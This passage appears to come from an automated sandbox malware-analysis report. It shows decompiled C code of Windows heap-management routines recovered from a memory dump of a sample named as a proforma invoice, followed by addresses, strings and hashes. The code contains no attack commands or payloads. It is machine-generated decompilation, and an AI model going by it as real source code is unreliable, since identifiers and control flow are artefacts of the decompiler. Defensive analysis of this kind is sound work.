						}
					}
					L11:
					_t402 = _t419[6];
					_t25 =  &(_t419[4]); // -16
					_t350 = _t25;
					_t254 =  *_t350;
					_v12 = _t254;
					_v20 = _t402;
					_t255 =  *((intOrPtr*)(_t254 + 4));
					__eflags =  *_t402 - _t255;
					if( *_t402 != _t255) {
						L61:
						_push(_t350);
						_push( *_t402);
						E00BAA80D(_t307, 0xd, _t350, _t255);
						goto L3;
					}
					__eflags =  *_t402 - _t350;
					if( *_t402 != _t350) {
						goto L61;
					}
					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
					_t404 =  *(_t307 + 0xb4);
					__eflags = _t404;
					if(_t404 == 0) {
						L20:
						_t352 = _v20;
						_t258 = _v12;
						 *_t352 = _t258;
						 *(_t258 + 4) = _t352;
						__eflags = _t419[1] & 0x00000008;
						if((_t419[1] & 0x00000008) != 0) {
							_t259 = E00B0A229(_t307, _t419);
							__eflags = _t259;
							if(_t259 != 0) {
								goto L21;
							} else {
								E00B0A309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
								goto L3;
							}
						}
						L21:
						_t354 = _t419[1];
						__eflags = _t354 & 0x00000004;
						if((_t354 & 0x00000004) != 0) {
							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
							__eflags = _t354 & 0x00000002;
							if((_t354 & 0x00000002) != 0) {
								__eflags = _t415 - 4;
								if(_t415 > 4) {
									_t415 = _t415 - 4;
									__eflags = _t415;
								}
							}
							_t91 =  &(_t419[8]); // -8
							_t262 = E00B3D540(_t91, _t415, 0xfeeefeee);
							_v20 = _t262;
							__eflags = _t262 - _t415;
							if(_t262 != _t415) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0xc);
								if( *(_t357 + 0xc) == 0) {
									_push("HEAP: ");
									E00AEB150();
								} else {
									E00AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_v20 + 0x10 + _t419);
								E00AEB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
								_t271 =  *[fs:0x30];
								_t421 = _t421 + 0xc;
								__eflags =  *((char*)(_t271 + 2));
								if( *((char*)(_t271 + 2)) != 0) {
									 *0xbd6378 = 1;
									asm("int3");
									 *0xbd6378 = 0;
								}
							}
						}
						_t381 = _a4;
						_t414 = _t419;
						_t419[1] = 0;
						_t419[3] = 0;
						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
						 *_t419 =  *_t381;
						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
						L4:
						_t420 = _t414 +  *_t381 * 8;
						if( *(_t307 + 0x4c) == 0) {
							L6:
							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
								__eflags =  *(_t307 + 0x4c);
								if( *(_t307 + 0x4c) != 0) {
									_t390 =  *(_t307 + 0x50) ^  *_t420;
									 *_t420 = _t390;
									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
									__eflags = _t390 >> 0x18 - _t328;
									if(__eflags != 0) {
										_push(_t328);
										E00B9FA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
									}
								}
								__eflags = _v5;
								if(_v5 == 0) {
									L94:
									_t382 = _t420[3];
									_t137 =  &(_t420[2]); // -16
									_t309 = _t137;
									_t186 =  *_t309;
									_v20 = _t186;
									_v16 = _t382;
									_t187 =  *((intOrPtr*)(_t186 + 4));
									__eflags =  *_t382 - _t187;
									if( *_t382 != _t187) {
										L63:
										_push(_t309);
										_push( *_t382);
										_push(_t187);
										_push(_t309);
										_push(0xd);
										L64:
										E00BAA80D(_t307);
										continue;
									}
									__eflags =  *_t382 - _t309;
									if( *_t382 != _t309) {
										goto L63;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
									_t393 =  *(_t307 + 0xb4);
									__eflags = _t393;
									if(_t393 == 0) {
										L104:
										_t330 = _v16;
										_t190 = _v20;
										 *_t330 = _t190;
										 *(_t190 + 4) = _t330;
										__eflags = _t420[0] & 0x00000008;
										if((_t420[0] & 0x00000008) == 0) {
											L107:
											_t331 = _t420[0];
											__eflags = _t331 & 0x00000004;
											if((_t331 & 0x00000004) != 0) {
												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t196;
												__eflags = _t331 & 0x00000002;
												if((_t331 & 0x00000002) != 0) {
													__eflags = _t196 - 4;
													if(_t196 > 4) {
														_t196 = _t196 - 4;
														__eflags = _t196;
														_v12 = _t196;
													}
												}
												_t162 =  &(_t420[4]); // -8
												_t197 = E00B3D540(_t162, _t196, 0xfeeefeee);
												_v20 = _t197;
												__eflags = _t197 - _v12;
												if(_t197 != _v12) {
													_t335 =  *[fs:0x30];
													__eflags =  *(_t335 + 0xc);
													if( *(_t335 + 0xc) == 0) {
														_push("HEAP: ");
														E00AEB150();
													} else {
														E00AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t420);
													E00AEB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
													_t203 =  *[fs:0x30];
													__eflags =  *((char*)(_t203 + 2));
													if( *((char*)(_t203 + 2)) != 0) {
														 *0xbd6378 = 1;
														asm("int3");
														 *0xbd6378 = 0;
													}
												}
											}
											_t394 = _a4;
											_t414[1] = 0;
											_t414[3] = 0;
											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
											 *_t414 =  *_t394;
											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
											break;
										}
										_t207 = E00B0A229(_t307, _t420);
										__eflags = _t207;
										if(_t207 != 0) {
											goto L107;
										}
										E00B0A309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
										continue;
									}
									_t342 =  *_t420 & 0x0000ffff;
									while(1) {
										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
											break;
										}
										_t210 =  *_t393;
										__eflags = _t210;
										if(_t210 == 0) {
											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
											L103:
											_t146 =  &(_t420[2]); // -16
											E00B0BC04(_t307, _t393, 1, _t146, _t212, _t342);
											goto L104;
										}
										_t393 = _t210;
									}
									_t212 = _t342;
									goto L103;
								} else {
									_t384 = _t414[6];
									_t102 =  &(_t414[4]); // -16
									_t311 = _t102;
									_t215 =  *_t311;
									_v20 = _t215;
									_v16 = _t384;
									_t216 =  *((intOrPtr*)(_t215 + 4));
									__eflags =  *_t384 - _t216;
									if( *_t384 != _t216) {
										L92:
										_push(_t311);
										_push( *_t384);
										E00BAA80D(_t307, 0xd, _t311, _t216);
										L93:
										_v5 = 0;
										goto L94;
									}
									__eflags =  *_t384 - _t311;
									if( *_t384 != _t311) {
										goto L92;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
									_t386 =  *(_t307 + 0xb4);
									__eflags = _t386;
									if(_t386 == 0) {
										L79:
										_t313 = _v16;
										_t219 = _v20;
										 *_t313 = _t219;
										 *(_t219 + 4) = _t313;
										__eflags = _t414[1] & 0x00000008;
										if((_t414[1] & 0x00000008) == 0) {
											L82:
											_t314 = _t414[1];
											__eflags = _t314 & 0x00000004;
											if((_t314 & 0x00000004) != 0) {
												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t221;
												__eflags = _t314 & 0x00000002;
												if((_t314 & 0x00000002) != 0) {
													__eflags = _t221 - 4;
													if(_t221 > 4) {
														_t221 = _t221 - 4;
														__eflags = _t221;
														_v12 = _t221;
													}
												}
												_t127 =  &(_t414[8]); // -8
												_t222 = E00B3D540(_t127, _t221, 0xfeeefeee);
												_v20 = _t222;
												__eflags = _t222 - _v12;
												if(_t222 != _v12) {
													_t316 =  *[fs:0x30];
													__eflags =  *(_t316 + 0xc);
													if( *(_t316 + 0xc) == 0) {
														_push("HEAP: ");
														E00AEB150();
													} else {
														E00AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t414);
													E00AEB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
													_t228 =  *[fs:0x30];
													_t421 = _t421 + 0xc;
													__eflags =  *((char*)(_t228 + 2));
													if( *((char*)(_t228 + 2)) != 0) {
														 *0xbd6378 = 1;
														asm("int3");
														 *0xbd6378 = 0;
													}
												}
											}
											goto L93;
										}
										_t232 = E00B0A229(_t307, _t414);
										__eflags = _t232;
										if(_t232 != 0) {
											goto L82;
										}
										E00B0A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
										goto L93;
									}
									_t323 =  *_t414 & 0x0000ffff;
									while(1) {
										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
											break;
										}
										_t235 =  *_t386;
										__eflags = _t235;
										if(_t235 == 0) {
											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
											L78:
											_t111 =  &(_t414[4]); // -16
											E00B0BC04(_t307, _t386, 1, _t111, _t237, _t323);
											goto L79;
										}
										_t386 = _t235;
									}
									_t237 = _t323;
									goto L78;
								}
							}
							return _t414;
						}
						_t398 =  *(_t307 + 0x50) ^  *_t420;
						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
						if(_t398 >> 0x18 != _t347) {
							_push(_t347);
							_push(0);
							_push(0);
							_push(_t420);
							_push(3);
							goto L64;
						}
						goto L6;
					} else {
						_t277 =  *_t419 & 0x0000ffff;
						_v16 = _t277;
						while(1) {
							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
								break;
							}
							_t279 =  *_t404;
							__eflags = _t279;
							if(_t279 == 0) {
								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
								break;
							} else {
								_t404 = _t279;
								_t277 =  *_t419 & 0x0000ffff;
								continue;
							}
						}
						E00B0BC04(_t307, _t404, 1, _t350, _t277, _v16);
						goto L20;
					}
				}
			}

0x00b099ca
0x00b099cc
0x00b099df
0x00b099e3
0x00b099f8
0x00b099fb
0x00b099fb
0x00000000
0x00b09a48
0x00b09a48
0x00b09a4c
0x00b09a51
0x00b09a55
0x00b09a61
0x00b09a66
0x00b09a68
0x00b51457
0x00b5145c
0x00b5145c
0x00b09a68
0x00b09a6e
0x00b09a71
0x00b09a74
0x00b09a76
0x00b51466
0x00b51469
0x00b51469
0x00b5146c
0x00b5146e
0x00b51471
0x00b51474
0x00b51477
0x00b51479
0x00b5159c
0x00b5159c
0x00b5159d
0x00b515a6
0x00b515ab
0x00b515ab
0x00000000
0x00b515ab
0x00b5147f
0x00b51481
0x00000000
0x00000000
0x00b5148a
0x00b5148d
0x00b51493
0x00b51495
0x00b514c0
0x00b514c0
0x00b514c3
0x00b514c6
0x00b514c8
0x00b514cb
0x00b514cf
0x00b514f2
0x00b514f2
0x00b514f5
0x00b514f8
0x00b51501
0x00b51508
0x00b5150b
0x00b5150e
0x00b51510
0x00b51513
0x00b51515
0x00b51515
0x00b51518
0x00b51518
0x00b51513
0x00b51521
0x00b51525
0x00b5152a
0x00b5152d
0x00b51530
0x00b51532
0x00b51539
0x00b5153d
0x00b5155d
0x00b51562
0x00b5153f
0x00b51555
0x00b5155a
0x00b51570
0x00b51577
0x00b5157c
0x00b51582
0x00b51585
0x00b51589
0x00b5158b
0x00b51592
0x00b51593
0x00b51593
0x00b51589
0x00b51530
0x00000000
0x00b514f8
0x00b514d5
0x00b514da
0x00b514dc
0x00000000
0x00b514de
0x00b514e8
0x00000000
0x00b514e8
0x00b51497
0x00b51497
0x00b514a4
0x00b514a4
0x00b514a7
0x00b514a9
0x00b514ab
0x00b514ab
0x00b5149c
0x00b5149e
0x00b514a0
0x00b514b0
0x00b514b0
0x00000000
0x00b514a2
0x00b514a2
0x00000000
0x00b514a2
0x00b514a0
0x00b514b3
0x00b514bb
0x00000000
0x00b514bb
0x00b51495
0x00b09a7c
0x00b09a7c
0x00b09a7f
0x00b09a7f
0x00b09a82
0x00b09a84
0x00b09a87
0x00b09a8a
0x00b09a8d
0x00b09a8f
0x00b5166a
0x00b5166a
0x00b5166b
0x00b51674
0x00000000
0x00b51674
0x00b09a95
0x00b09a97
0x00000000
0x00000000
0x00b09aa0
0x00b09aa3
0x00b09aa9
0x00b09aab
0x00b09ad7
0x00b09ad7
0x00b09ada
0x00b09add
0x00b09adf
0x00b09ae2
0x00b09ae6
0x00b09b22
0x00b09b27
0x00b09b29
0x00000000
0x00b09b2b
0x00b515be
0x00000000
0x00b515be
0x00b09b29
0x00b09ae8
0x00b09ae8
0x00b09aeb
0x00b09aee
0x00b515cb
0x00b515d2
0x00b515d5
0x00b515d7
0x00b515da
0x00b515dc
0x00b515dc
0x00b515dc
0x00b515da
0x00b515e5
0x00b515e9
0x00b515ee
0x00b515f1
0x00b515f3
0x00b515f9
0x00b51600
0x00b51604
0x00b51624
0x00b51629
0x00b51606
0x00b5161c
0x00b51621
0x00b51637
0x00b5163e
0x00b51643
0x00b51649
0x00b5164c
0x00b51650
0x00b51656
0x00b5165d
0x00b5165e
0x00b5165e
0x00b51650
0x00b515f3
0x00b09af4
0x00b09af7
0x00b09afc
0x00b09b00
0x00b09b04
0x00b09b08
0x00b09b14
0x00b099fe
0x00b09a04
0x00b09a07
0x00000000
0x00b09a29
0x00b5169c
0x00b516a0
0x00b516a5
0x00b516a9
0x00b516b5
0x00b516ba
0x00b516bc
0x00b516be
0x00b516c3
0x00b516c3
0x00b516bc
0x00b516c8
0x00b516cc
0x00b5181b
0x00b5181b
0x00b5181e
0x00b5181e
0x00b51821
0x00b51823
0x00b51826
0x00b51829
0x00b5182c
0x00b5182e
0x00b51688
0x00b51688
0x00b51689
0x00b5168b
0x00b5168c
0x00b5168d
0x00b5168f
0x00b51692
0x00000000
0x00b51692
0x00b51834
0x00b51836
0x00000000
0x00000000
0x00b5183f
0x00b51842
0x00b51848
0x00b5184a
0x00b51875
0x00b51875
0x00b51878
0x00b5187b
0x00b5187d
0x00b51880
0x00b51884
0x00b518a7
0x00b518a7
0x00b518aa
0x00b518ad
0x00b518b6
0x00b518bd
0x00b518c0
0x00b518c3
0x00b518c5
0x00b518c8
0x00b518ca
0x00b518ca
0x00b518cd
0x00b518cd
0x00b518c8
0x00b518d5
0x00b518da
0x00b518df
0x00b518e2
0x00b518e5
0x00b518e7
0x00b518ee
0x00b518f2
0x00b51912
0x00b51917
0x00b518f4
0x00b5190a
0x00b5190f
0x00b51925
0x00b5192c
0x00b51931
0x00b5193a
0x00b5193e
0x00b51940
0x00b51947
0x00b51948
0x00b51948
0x00b5193e
0x00b518e5
0x00b5194f
0x00b51952
0x00b51956
0x00b5195d
0x00b51961
0x00b5196d
0x00000000
0x00b5196d
0x00b5188a
0x00b5188f
0x00b51891
0x00000000
0x00000000
0x00b5189d
0x00000000
0x00b5189d
0x00b5184c
0x00b51859
0x00b51859
0x00b5185c
0x00000000
0x00000000
0x00b51851
0x00b51853
0x00b51855
0x00b51865
0x00b51865
0x00b51866
0x00b51868
0x00b51870
0x00000000
0x00b51870
0x00b51857
0x00b51857
0x00b5185e
0x00000000
0x00b516d2
0x00b516d2
0x00b516d5
0x00b516d5
0x00b516d8
0x00b516da
0x00b516dd
0x00b516e0
0x00b516e3
0x00b516e5
0x00b51808
0x00b51808
0x00b51809
0x00b51812
0x00b51817
0x00b51817
0x00000000
0x00b51817
0x00b516eb
0x00b516ed
0x00000000
0x00000000
0x00b516f6
0x00b516f9
0x00b516ff
0x00b51701
0x00b5172c
0x00b5172c
0x00b5172f
0x00b51732
0x00b51734
0x00b51737
0x00b5173b
0x00b5175e
0x00b5175e
0x00b51761
0x00b51764
0x00b5176d
0x00b51774
0x00b51777
0x00b5177a
0x00b5177c
0x00b5177f
0x00b51781
0x00b51781
0x00b51784
0x00b51784
0x00b5177f
0x00b5178c
0x00b51791
0x00b51796
0x00b51799
0x00b5179c
0x00b5179e
0x00b517a5
0x00b517a9
0x00b517c9
0x00b517ce
0x00b517ab
0x00b517c1
0x00b517c6
0x00b517dc
0x00b517e3
0x00b517e8
0x00b517ee
0x00b517f1
0x00b517f5
0x00b517f7
0x00b517fe
0x00b517ff
0x00b517ff
0x00b517f5
0x00b5179c
0x00000000
0x00b51764
0x00b51741
0x00b51746
0x00b51748
0x00000000
0x00000000
0x00b51754
0x00000000
0x00b51754
0x00b51703
0x00b51710
0x00b51710
0x00b51713
0x00000000
0x00000000
0x00b51708
0x00b5170a
0x00b5170c
0x00b5171c
0x00b5171c
0x00b5171d
0x00b5171f
0x00b51727
0x00000000
0x00b51727
0x00b5170e
0x00b5170e
0x00b51715
0x00000000
0x00b51715
0x00b516cc
0x00b09a45
0x00b09a45
0x00b09a0e
0x00b09a1c
0x00b09a23
0x00b5167e
0x00b5167f
0x00b51681
0x00b51683
0x00b51684
0x00000000
0x00b51684
0x00000000
0x00b09aad
0x00b09aad
0x00b09ab0
0x00b09ab3
0x00b09ab3
0x00b09ab6
0x00000000
0x00000000
0x00b09ab8
0x00b09aba
0x00b09abc
0x00b09ac8
0x00b09ac8
0x00000000
0x00b09abe
0x00b09abe
0x00b09ac0
0x00000000
0x00b09ac0
0x00b09abc
0x00b09ad2
0x00000000
0x00b09ad2
0x00b09aab

Strings

HEAP[%wZ]: , xrefs: 00B51550, 00B51617, 00B517BC, 00B51905
HEAP: , xrefs: 00B5155D, 00B51624, 00B517C9, 00B51912
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 00B51572, 00B51639, 00B517DE, 00B51927

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 6ce9f3683a691d48c3e789edf0d01862e336c52dfa02d719f1e5947880597a3d
Instruction ID: 1b2b5276a419bb01b557d9a5c8b1049324042859b208a9398ff162d55acf3561
Opcode Fuzzy Hash: 6ce9f3683a691d48c3e789edf0d01862e336c52dfa02d719f1e5947880597a3d
Instruction Fuzzy Hash: FA22CD70A002419FDB24DF2DC895B7ABBF5EF45705F2489E9E8468B382E735D889CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B0B477, Relevance: 4.2, Strings: 3, Instructions: 405
COMMONCrypto

Download Yara Rule

C-Code - Quality: 67%

			E00B0B477(signed int __ecx, signed int* __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int* _v20;
				signed int _v24;
				char _v28;
				signed int _v44;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t139;
				void* _t141;
				signed int* _t143;
				signed int* _t144;
				intOrPtr* _t147;
				char _t160;
				signed int* _t163;
				signed char* _t164;
				intOrPtr _t165;
				signed int* _t167;
				signed char* _t168;
				intOrPtr _t193;
				intOrPtr* _t195;
				signed int _t203;
				signed int _t209;
				signed int _t211;
				intOrPtr _t214;
				intOrPtr* _t231;
				intOrPtr* _t236;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t240;
				intOrPtr _t241;
				char _t243;
				signed int _t252;
				signed int _t254;
				signed char _t259;
				signed int _t264;
				signed int _t268;
				intOrPtr _t277;
				unsigned int _t279;
				signed int* _t283;
				intOrPtr* _t284;
				unsigned int _t287;
				signed int _t291;
				signed int _t293;

				_v8 =  *0xbdd360 ^ _t293;
				_t223 = __edx;
				_v20 = __edx;
				_t291 = __ecx;
				_t276 =  *__edx;
				_t231 = E00B0B8E4( *__edx);
				_t292 = __ecx + 0x8c;
				_v16 = _t231;
				if(_t231 == __ecx + 0x8c) {
					L38:
					_t131 = 0;
					L34:
					return E00B2B640(_t131, _t223, _v8 ^ _t293, _t276, _t291, _t292);
				}
				if( *0xbd8748 >= 1) {
					__eflags =  *((intOrPtr*)(_t231 + 0x14)) -  *__edx;
					if(__eflags < 0) {
						_t214 =  *[fs:0x30];
						__eflags =  *(_t214 + 0xc);
						if( *(_t214 + 0xc) == 0) {
							_push("HEAP: ");
							E00AEB150();
						} else {
							E00AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(UCRBlock->Size >= *Size)");
						E00AEB150();
						__eflags =  *0xbd7bc8;
						if(__eflags == 0) {
							__eflags = 1;
							E00BA2073(_t223, 1, _t291, 1);
						}
						_t231 = _v16;
					}
				}
				_t5 = _t231 - 8; // -8
				_t292 = _t5;
				_t134 =  *((intOrPtr*)(_t292 + 6));
				if(_t134 != 0) {
					_t223 = (_t292 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
				} else {
					_t223 = _t291;
				}
				_t276 = _v20;
				_v28 =  *((intOrPtr*)(_t231 + 0x10));
				_t139 =  *(_t291 + 0xcc) ^  *0xbd8a68;
				_v12 = _t139;
				if(_t139 != 0) {
					 *0xbdb1e0(_t291,  &_v28, _t276);
					_t141 = _v12();
					goto L8;
				} else {
					_t203 =  *((intOrPtr*)(_t231 + 0x14));
					_v12 = _t203;
					if(_t203 -  *_t276 <=  *(_t291 + 0x6c) << 3) {
						_t264 = _v12;
						__eflags = _t264 -  *(_t291 + 0x5c) << 3;
						if(__eflags < 0) {
							 *_t276 = _t264;
						}
					}
					_t209 =  *(_t291 + 0x40) & 0x00040000;
					asm("sbb ecx, ecx");
					_t268 = ( ~_t209 & 0x0000003c) + 4;
					_v12 = _t268;
					if(_t209 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v48);
						_push(3);
						_push(_t291);
						_push(0xffffffff);
						_t211 = E00B29730();
						__eflags = _t211;
						if(_t211 < 0) {
							L56:
							_push(_t268);
							_t276 = _t291;
							E00BAA80D(_t291, 1, _v44, 0);
							_t268 = 4;
							goto L7;
						}
						__eflags = _v44 & 0x00000060;
						if((_v44 & 0x00000060) == 0) {
							goto L56;
						}
						__eflags = _v48 - _t291;
						if(__eflags != 0) {
							goto L56;
						}
						_t268 = _v12;
					}
					L7:
					_push(_t268);
					_push(0x1000);
					_push(_v20);
					_push(0);
					_push( &_v28);
					_push(0xffffffff);
					_t141 = E00B29660();
					 *((intOrPtr*)(_t291 + 0x20c)) =  *((intOrPtr*)(_t291 + 0x20c)) + 1;
					L8:
					if(_t141 < 0) {
						 *((intOrPtr*)(_t291 + 0x214)) =  *((intOrPtr*)(_t291 + 0x214)) + 1;
						goto L38;
					}
					_t143 =  *( *[fs:0x30] + 0x50);
					if(_t143 != 0) {
						__eflags =  *_t143;
						if(__eflags == 0) {
							goto L10;
						}
						_t144 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
						L11:
						if( *_t144 != 0) {
							__eflags =  *( *[fs:0x30] + 0x240) & 0x00000001;
							if(__eflags != 0) {
								E00BA138A(_t223, _t291, _v28,  *_v20, 2);
							}
						}
						if( *((intOrPtr*)(_t291 + 0x4c)) != 0) {
							_t287 =  *(_t291 + 0x50) ^  *_t292;
							 *_t292 = _t287;
							_t259 = _t287 >> 0x00000010 ^ _t287 >> 0x00000008 ^ _t287;
							if(_t287 >> 0x18 != _t259) {
								_push(_t259);
								E00B9FA2B(_t223, _t291, _t292, _t291, _t292, __eflags);
							}
						}
						_t147 = _v16 + 8;
						 *((char*)(_t292 + 2)) = 0;
						 *((char*)(_t292 + 7)) = 0;
						_t236 =  *((intOrPtr*)(_t147 + 4));
						_t277 =  *_t147;
						_v24 = _t236;
						_t237 =  *_t236;
						_v12 = _t237;
						_t238 = _v16;
						if(_t237 !=  *((intOrPtr*)(_t277 + 4)) || _v12 != _t147) {
							_push(_t238);
							_push(_v12);
							E00BAA80D(0, 0xd, _t147,  *((intOrPtr*)(_t277 + 4)));
							_t238 = _v16;
						} else {
							_t195 = _v24;
							 *_t195 = _t277;
							 *((intOrPtr*)(_t277 + 4)) = _t195;
						}
						if( *(_t238 + 0x14) == 0) {
							L22:
							_t223[0x30] = _t223[0x30] - 1;
							_t223[0x2c] = _t223[0x2c] - ( *(_t238 + 0x14) >> 0xc);
							 *((intOrPtr*)(_t291 + 0x1e8)) =  *((intOrPtr*)(_t291 + 0x1e8)) +  *(_t238 + 0x14);
							 *((intOrPtr*)(_t291 + 0x1fc)) =  *((intOrPtr*)(_t291 + 0x1fc)) + 1;
							 *((intOrPtr*)(_t291 + 0x1f8)) =  *((intOrPtr*)(_t291 + 0x1f8)) - 1;
							_t279 =  *(_t238 + 0x14);
							if(_t279 >= 0x7f000) {
								 *((intOrPtr*)(_t291 + 0x1ec)) =  *((intOrPtr*)(_t291 + 0x1ec)) - _t279;
								_t279 =  *(_t238 + 0x14);
							}
							_t152 = _v20;
							_t240 =  *_v20;
							_v12 = _t240;
							_t241 = _v16;
							if(_t279 <= _t240) {
								__eflags =  *((intOrPtr*)(_t241 + 0x10)) + _t279 - _t223[0x28];
								if( *((intOrPtr*)(_t241 + 0x10)) + _t279 != _t223[0x28]) {
									 *_v20 = _v12 + ( *_t292 & 0x0000ffff) * 8;
									L26:
									_t243 = 0;
									 *((char*)(_t292 + 3)) = 0;
									_t276 = _t223[0x18];
									if(_t223[0x18] != _t223) {
										_t160 = (_t292 - _t223 >> 0x10) + 1;
										_v24 = _t160;
										__eflags = _t160 - 0xfe;
										if(_t160 >= 0xfe) {
											_push(0);
											_push(0);
											E00BAA80D(_t276, 3, _t292, _t223);
											_t160 = _v24;
										}
										_t243 = _t160;
									}
									 *((char*)(_t292 + 6)) = _t243;
									_t163 =  *( *[fs:0x30] + 0x50);
									if(_t163 != 0) {
										__eflags =  *_t163;
										if( *_t163 == 0) {
											goto L28;
										}
										_t227 = 0x7ffe0380;
										_t164 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
										goto L29;
									} else {
										L28:
										_t227 = 0x7ffe0380;
										_t164 = 0x7ffe0380;
										L29:
										if( *_t164 != 0) {
											_t165 =  *[fs:0x30];
											__eflags =  *(_t165 + 0x240) & 0x00000001;
											if(( *(_t165 + 0x240) & 0x00000001) != 0) {
												__eflags = E00B07D50();
												if(__eflags != 0) {
													_t227 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x89]);
												}
												_t276 = _t292;
												E00BA1582(_t227, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t227 & 0x000000ff);
											}
										}
										_t223 = 0x7ffe038a;
										_t167 =  *( *[fs:0x30] + 0x50);
										if(_t167 != 0) {
											__eflags =  *_t167;
											if( *_t167 == 0) {
												goto L31;
											}
											_t168 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
											goto L32;
										} else {
											L31:
											_t168 = _t223;
											L32:
											if( *_t168 != 0) {
												__eflags = E00B07D50();
												if(__eflags != 0) {
													_t223 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
												}
												_t276 = _t292;
												E00BA1582(_t223, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t223 & 0x000000ff);
											}
											_t131 = _t292;
											goto L34;
										}
									}
								}
								_t152 = _v20;
							}
							E00B0B73D(_t291, _t223,  *((intOrPtr*)(_t241 + 0x10)) + _v12 + 0xffffffe8, _t279 - _v12, _t292, _t152);
							 *_v20 =  *_v20 << 3;
							goto L26;
						} else {
							_t283 =  *(_t291 + 0xb8);
							if(_t283 != 0) {
								_t190 =  *(_t238 + 0x14) >> 0xc;
								while(1) {
									__eflags = _t190 - _t283[1];
									if(_t190 < _t283[1]) {
										break;
									}
									_t252 =  *_t283;
									__eflags = _t252;
									_v24 = _t252;
									_t238 = _v16;
									if(_t252 == 0) {
										_t190 = _t283[1] - 1;
										__eflags = _t283[1] - 1;
										L70:
										E00B0BC04(_t291, _t283, 0, _t238, _t190,  *(_t238 + 0x14));
										_t238 = _v16;
										goto L19;
									}
									_t283 = _v24;
								}
								goto L70;
							}
							L19:
							_t193 =  *_t238;
							_t284 =  *((intOrPtr*)(_t238 + 4));
							_t254 =  *((intOrPtr*)(_t193 + 4));
							_v24 = _t254;
							_t238 = _v16;
							if( *_t284 != _t254 ||  *_t284 != _t238) {
								_push(_t238);
								_push( *_t284);
								E00BAA80D(0, 0xd, _t238, _v24);
								_t238 = _v16;
							} else {
								 *_t284 = _t193;
								 *((intOrPtr*)(_t193 + 4)) = _t284;
							}
							goto L22;
						}
					}
					L10:
					_t144 = 0x7ffe0380;
					goto L11;
				}
			}

0x00b0b486
0x00b0b48a
0x00b0b48e
0x00b0b491
0x00b0b493
0x00b0b49a
0x00b0b49c
0x00b0b4a2
0x00b0b4a7
0x00b0b6fc
0x00b0b6fc
0x00b0b6b3
0x00b0b6c3
0x00b0b6c3
0x00b0b4b4
0x00b5294f
0x00b52951
0x00b52957
0x00b5295d
0x00b52961
0x00b52980
